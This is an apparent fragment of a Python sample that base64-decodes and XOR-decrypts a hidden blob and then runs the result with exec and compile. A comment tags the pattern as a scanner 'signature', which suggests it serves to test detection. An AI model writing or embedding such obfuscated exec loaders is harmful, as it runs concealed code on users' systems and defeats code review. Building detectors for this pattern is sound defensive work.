DSeHEHkYyRGZr2uc8QkJUeWWx9lAgMGlaTPahenl1fRVN8sIeNTkhPwCzi1BCcmlaQffIEW5kREdP/85YNBoRXEaz9C9zcXZQf8yLTSAwOWp//soZc09EFxqZi1A9MHZUSf2DWRc="
_K = bytes.fromhex("ab701d101b352093")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
